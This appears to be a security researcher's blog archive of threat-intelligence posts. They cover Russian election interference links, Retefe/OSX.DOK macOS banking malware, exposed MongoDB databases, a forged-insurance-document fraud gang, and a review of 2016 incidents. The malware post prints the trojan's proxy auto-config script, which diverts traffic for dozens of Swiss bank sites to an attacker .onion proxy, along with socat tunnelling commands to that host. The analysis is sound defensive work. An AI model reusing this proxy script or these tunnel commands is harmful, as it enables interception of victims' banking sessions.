https://en.wikipedia.org/wiki/The_Plot_to_Hack_America

tl:dr - Coincidence takes a lot of hard work, Also - Russia sought to manipulate the election by way of a number methods including social media propaganda, hacking of DNC emails and strategically placed adverts

Is Ukraine the Test Lab for Russian - Wired

https://www.wired.com/story/russian-hackers-attack-ukraine/

tl:dr - Attackers gained access to critical systems, excellent analysis from Dragos here 

 

Retefe v OSX.DOK Part 2

I last month had some time to look at the latest iteration of OSX.DOK/Retefe for macOS and thanks to Jaromir from Avast and the excellent VB presentation I can conclude they are almost identical, the reasons for this include the following:

From the presentation at VB Avast noted

The below is collection of the some of the recent samples collected from Swiss campaigns targeting OSX victims.

The payloads are being signed with developer certificates presumably either stolen which enable them to bypass the macOS security feature known as Gatekeeper, it's not clear how these accounts are being used or if they are using pseudonyms to prevent suspicion below are some samples. You can use the codesign command with relevant parameters to identify the signed status of the app bundle 

Masquerading as trusteer.app

 

All macOS apps need a manifest file known as a info.plist file which includes the MachineOSBuild as a tag, which in this case was 13F1911 which is commonly known as OSX Mavericks, which means it was likely a Virtual Machine or the developer has an older OS 

The samples are UPX packed 

Screen Shot 2017-05-17 at 22.57.44.png

I've just uploaded one single sample for researchers to analyse, however, Apple is actively investigating the misuse of these certificates.

https://www.virustotal.com/en/file/80634e7b69f77825e5316e046c5a08c70b9950123845ef9a54a1abb9d8acb9a9/analysis/1495058845/

  • 11/05 notify Apple Security
  • 13/05 confirmed incident with Apple Security
  • 17/05 shared developer identities with Apple

Retefe and OSX.DOK - One and the same?

A few vendors announced a malware family known as OSX.Dok which targeted OSX, using strikingly similar methods that i had seen used by Retefe, having observed some of the configuration changes recently, this seemed too similar to be a simple coincidence.

For those unfamiliar, Retefe is a trojan, and numerous configurations exist which usually target most EU banks. The United Kingdom, and France but a real target in my own experience has been Germany and Switzerland. This article last week identified Germany but included a Swiss screenshot by Checkpoint here so slightly confusing.

The part of Retefe which struck me as similar included the proxy .JS file for the trojan to identify the range of banking sites it wants to intercept.

function FindProxyForURL(url, host) {
    var proxy = "PROXY paoyu7gub72lykuk.onion:88;";
    var hosts = new Array('*.postfinance.ch', 'cs.directnet.com', '*akb.ch',
        '*ubs.com', 'tb.raiffeisendirect.ch', '*bkb.ch', '*lukb.ch',
        '*zkb.ch', '*onba.ch', '*gkb.ch', '*bekb.ch', '*zugerkb.ch',
        '*bcge.ch', '*raiffeisen.ch', '*credit-suisse.com', '*.clientis.ch',
        'clientis.ch', '*bcvs.ch', '*.cic.ch', 'cic.ch', '*baloise.ch',
        'ukb.ch', '*.ukb.ch', 'urkb.ch', '*.urkb.ch', '*eek.ch', '*szkb.ch',
        '*shkb.ch', '*glkb.ch', '*nkb.ch', '*owkb.ch', '*cash.ch',
        '*bcf.ch', 'ebanking.raiffeisen.ch', '*bcv.ch', '*juliusbaer.com',
        '*abs.ch', '*bcn.ch', '*blkb.ch', '*bcj.ch', '*zuercherlandbank.ch',
        '*valiant.ch', '*wir.ch', '*bankthalwil.ch', '*piguetgalland.ch',
        '*triba.ch', '*inlinea.ch', '*bernerlandbank.ch',
        '*bancasempione.ch', '*bsibank.com', '*corneronline.ch',
        '*vermoegenszentrum.ch', '*gobanking.ch', '*slbucheggberg.ch',
        '*slfrutigen.ch', '*hypobank.ch', '*regiobank.ch', '*rbm.ch',
        '*hbl.ch', '*ersparniskasse.ch', '*ekr.ch',
        '*sparkasse-dielsdorf.ch', '*eki.ch', '*bankgantrisch.ch',
        '*bbobank.ch', '*alpharheintalbank.ch', '*aekbank.ch',
        '*acrevis.ch', '*credinvest.ch', '*bancazarattini.ch', '*appkb.ch',
        '*arabbank.ch', '*apbank.ch', '*notenstein-laroche.ch',
        '*bankbiz.ch', '*bankleerau.ch', '*btv3banken.ch', '*dcbank.ch',
        '*bordier.com', '*banquethaler.com', '*bankzimmerberg.ch',
        '*bbva.ch', '*bankhaus-jungholz.ch', '*sparhafen.ch',
        '*banquecramer.ch', '*banqueduleman.ch', '*bcpconnect.com',
        '*bil.com', '*vontobel.com', '*pbgate.net');
    for (var i = 0; i < hosts.length; i++) {
        if (shExpMatch(host, hosts[i])) {
            return proxy
        }
    }
    return "DIRECT"
}

from the OSX version which include the following LaunchAgents

/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050

/usr/local/bin/socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:5588,socksport=9050

You'll note the .onion site in question is present both in this configuration and in the article discussed above. Additionally, the similarities continue:

Retefe       OSX/Dok

Root Certificate    Root Certificate

Proxy hijacking   Proxy hijacking

paoyu7gub72lykuk.onion paoyu7gub72lykuk.onion

Banking trojans have been at the forefront of media for a while, and the revenue they generate are clearly attractive to criminals and to law enforcement as demonstrated recently both here and here.

 

 

 

 

 

#MongoDB - A dumpster fire of cry laughter

Thankfully, a lot of interest is on MongoDB over the past few weeks. It's not a new problem, however, the more people reporting on it the more C-level people will ask the question of 'where is my MongoDB?'

John Matherly originally wrote about this in 2015 This entry has since been resurrected and will no doubt be again resurrected in another 12 months. A significant media outlet are taking note in this extortion practice and for me, whilst painful for the victims this is simply part of the stratagems associated with online survival.

There are circumstances in which you must sacrifice short-term objectives in order to gain the long-term goal. This is the scapegoat strategy whereby someone else suffers the consequences so that the rest do not.
— https://en.wikipedia.org/wiki/Thirty-Six_Stratagems#Sacrifice_the_plum_tree_to_preserve_the_peach_tree

So, with this in mind. Let's take a look at the data currently available as of 05/01/17. Data will be redacted, I don't want the responsibility of dealing with the consequences if they are eventually extorted.

  •  Job Site

IP address, location, current job title

  • Health data 

Passwords, DOB, Weight, Height, Phone number, Diabetic status, last login IP


  • An android .APK backend for tracking users of a Satellite app

Some further data included, Network type, IE: 3G, 2G

The Money Team - A multinational fraud gang

The thriving carding forums that reside under most .ru domains or .su offer a significant amount of diverse fraud options, ranging from simple carding fraud from dumps or CVV dumps. I had identified, ' The Money Team' by way of their preference for offering what is known as pink slips.

 

Pink slips are known better as those used in financial dealings, and in particular Insurance firms. Those fraudulent forms used here are targeting the following

  • Alpha Insurance
  • CSG
  • FAC
  • Ingosstrakh - A Moscow-based entity with financial stability rating of A++

Offering a substantial amount of documentation via a DNM for the following prices, which are competitively priced based upon a sliding scale depending on amount purchased. IE: more slips, the cost goes down.

  • 1 completed application form - 2500r
  • 10 letterheads - 900p 
  • 20 forms - 870r 
  • 30 forms - 850r 
  • 50 forms - 700r 
  • 100 forms - 650r 
  • 300 forms - 550r 
  • 500 forms - 500r 
  • 1000 forms - 450r 
  • 5000 forms - 400r 
  • 10000 forms - 380r

As a potential buyer of the documents you can request a sample, a reputation as a buyer is required, and if you're feeling adventurous you can ask for a courier such as SDEK/DIMEX/CSE.

Branching out, and diversification of a criminal enterprise is key to success and the soon to be launched tmtdocs.com site offers a direct link to their trades

The site unsurprisingly sits behind CloudFlare 

I will be paying close attention to what other services pop up from TMT.

 

2016 a year in Review

Goodbye 2016

A year in security is a considerable amount of time, the amount of breaches, attacks and disclosures have been almost non stop and we're not finished yet. I have listed below some of the most notable 'cyber' incidents which caught my eye for a number of reasons.


  • HSBC Bank attacks - January 
  • Operation Dust Storm - Feburary
  • DROWN vulnerability - March
  • Panama Papers - April
  • RDP Bruteforcing - May
  • Democratic Party Hack - June and of course the disappearance of Angler around the same time and NATO recognises Cyber as a '5th domain of warfare' 
  • xDedic forum - July
  • ShadowBrokers 'dump' - August
  • Brian Krebs DDOS attack - September and the Congressional oversight releases the report on the OPM breach 
  • Trickbot - October
  • Three data 'breach' - November
  • Avalanche takedown - December Bonus video footage of the arrest here  

No real surprises for those in the trenches of security, I've missed out some of the more 'media' friendly stories as cyber became front page news this year, with every DDOS and breach impacting those who have zero idea how the incident will have occurred.  Typically cloudy responses from the organisations affected do not help the affected, or more importantly the victims.  

What are companies doing to ensure this doesn't happen to them? The basics, the advanced intelligence led security endeavours to look for the potential attack vectors and methods being used elsewhere, and deriving the intelligence from them, but the fact is most attacks are NOT sophisticated. This phrase is only tagged onto those incidents that make front page news, or as i call them the BBC factor. I am a big fan of @thegruqg for one his clarity in tone for security along with his razor wit is good to see in security, he is a poster boy for security snark and backs it up with proof.

The ultimate being this tweet

New rule: if you are hacked via OWASP Top 10, you’re not allowed to call it “advanced” or “sophisticated.”
— https://twitter.com/thegrugq/status/658991205816995840

 

And he is so right, Tesco may have been hacked by a vulnerability in the back office system, or an insider threat offering access to his terminal for transactional access, but the fact remains few of the breaches above where ' sophisticated'

  1. xDedic - bruteforcing RDP sessions
  2. Three Data incident - insider
  3. Panama Papers - SQL Injection
  4. Brian Krebs DOS attacks - hardcoded passwords and insecure protocols in CCTV, and DVR systems
  5. OPM breach - ignorance of the clear threats and lack of understanding from top to bottom, which resulted in the Oversight report and the person at the top losing her job.

 

2017 predictions are here, and i'm totally serious

Security predictions for 2̶0̶1̶7̶ 1998
1. Macro malware
2.MD5 passwords
3.Companies threatening security researchers for disclosures.
— https://twitter.com/Bry_Campbell/status/810091303417610240